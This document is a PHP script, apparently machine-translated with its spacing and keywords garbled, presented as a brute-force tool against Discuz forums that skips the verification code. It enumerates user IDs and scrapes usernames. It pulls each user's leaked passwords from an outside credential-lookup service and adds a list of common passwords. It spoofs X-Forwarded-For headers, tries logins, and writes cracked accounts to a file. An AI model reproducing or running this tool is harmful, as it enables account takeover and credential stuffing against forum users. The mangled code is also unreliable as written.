Discuz brute force script disregards Verification Code

<? Phpclassfuckdz {publicfunctionsgk ($ user) {$ a = file_get_contents (" http://www.soyun.org/cha_api.php?so= $ User & auto = "); $ a = iconv (" UTF-8 "," GB2312 // IGNORE ", $ a); preg_match_all ("/7% \ "> (. *) </isU ", $ a, $ arr); unset ($ arr [0]); foreach ($ arras $ key => $ r) {return $ r ;}} publicfunctiongetuid ($ host, $ uid) {$ ip = rand (100,244 ). '. '. rand (100,244 ). '. '. rand (100,244 ). '. '. rand (100,244); $ opts = array ('http' => array ('method' => 'get', 'header' => "User-Agent: mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 + (KHTML, like Gecko) Version/3.0 Mobile \ r \ nReferer: http://www.baidu.com/index.php \ R \ nX-Forwarded-For: $ ip \ r \ nCookie: xx = xx ", 'timeout' => 15,); $ context = stream_context_create ($ opts ); $ a = file_get_contents ("$ host/home. php? Mod = space & do = profile & from = space & uid = $ uid ", false, $ context); if (strpos ($ a, 'charset = UTF-8 ')) {$ a = iconv ("UTF-8", "GB2312 // IGNORE", $ a);} if (preg_match ("/<title> (. *) Individual/isU ", $ a, $ arr) {$ a = str_replace (" \ r "," ", trim ($ arr [1]); return $ a = str_replace ("\ n", "", $ a) ;}else {returnfalse ;}} publicfunctionis_pass ($ host, $ user, $ pass) {$ ip = revert (100,244 ). '. '. rand (100,244 ). '. '. rand (100,244 ). '. '. rand (100,244); $ opts = array ('http' => array ('method' => 'get', 'header' => "User-Agent: mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 + (KHTML, like Gecko) Version/3.0 Mobile \ r \ nReferer: http://www.baidu.com/index.php \ R \ nX-Forwarded-For: $ ip \ r \ nCookie: xx = xx ", 'timeout' => 15,); $ context = stream_context_create ($ opts ); $ a = file_get_contents ("$ host/member. php? Mod = logging & action = login & loginsubmit = yes & infloat = yes & lssubmit = yes & inajax = 1 & handlekey = ls & quickforward = yes & username = $ user & password = $ pass ", false, $ context); if (strpos ($ a, "window. location. href ") {returntrue;} else {returnfalse;} publicfunctioncrack ($ host, $ a, $ B) {$ host = str_replace (" http ://", "", $ host); $ host = "http ://". $ host. "/"; for ($ vip = $ a; $ vip <= $ B; $ vip ++) {if (! ($ User = $ this-> getuid ($ host, $ vip) {continue;} $ pass = $ this-> sgk ($ user); array_push ($ pass, "123456"); array_push ($ pass, "654321"); array_push ($ pass, "123123"); array_push ($ pass, "woaini"); array_push ($ pass, "caonima"); array_push ($ pass, "12345"); array_push ($ pass, "12345789"); array_push ($ pass, "5201314"); array_push ($ pass, "1314520"); array_push ($ pass, $ user); array_push ($ pass, $ user. & quot; 123456 & quot;); array_push ($ p Ass, "abc123"); array_push ($ pass, $ user. ".. "); for ($ I = 0; isset ($ pass [$ I]); $ I ++) {echo" \ r \ n is cracking UID: $ vip -[". $ user. "] ---". $ pass [$ I]. ""; if ($ this-> is_pass ($ host, $ user, $ pass [$ I]) {echo "cracked! \ R \ n ------------------ "; file_put_contents (" OK .txt ", $ user. "---". $ pass [$ I]. "\ r \ n", FILE_APPEND); break;} else {echo "cracking failed" ;}}}$ f = newfuckdz (); error_reporting (0 ); set_time_limit (0); if (empty ($ argv [1]) {print_r ("++ ++: php.exe $ argv [0] URL start uid end uid example: php.exe $ argv [0] http://phpinfo.me /1 255 knots are stored in the Blog in OK .txt: http://phpinfo.me ++ ++ \ N ");} else {if (! Empty ($ argv [1]) {$ f-> crack ($ argv [1], $ argv [2], $ argv [3]);} else {echo "Funny ratio" ;}}?>